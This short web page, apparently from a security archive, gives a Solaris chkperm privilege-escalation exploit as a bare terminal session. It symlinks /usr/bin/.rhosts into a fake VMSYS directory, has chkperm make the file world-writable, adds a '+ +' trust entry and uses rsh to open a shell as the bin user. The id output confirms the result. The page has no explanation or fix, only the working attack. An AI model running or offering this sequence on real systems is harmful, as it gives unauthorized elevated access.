|
|
Solaris chkperm Vulnerability
% mkdir /tmp/foo % mkdir /tmp/foo/lib % chmod -R 777 /tmp/foo % setenv VMSYS /tmp/foo % umask 0000 % ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc % /usr/vmsys/bin/chkperm -l -u foo % ls -l /usr/bin/.rhosts -rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts % echo "+ +" >> /usr/bin/.rhosts % ls -l /usr/bin/.rhosts -rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts % rsh -l bin localhost /bin/csh -i Warning: no access to tty; thus no job control in this shell... % id uid=2(bin) gid=2(bin) |
|
Privacy Statement |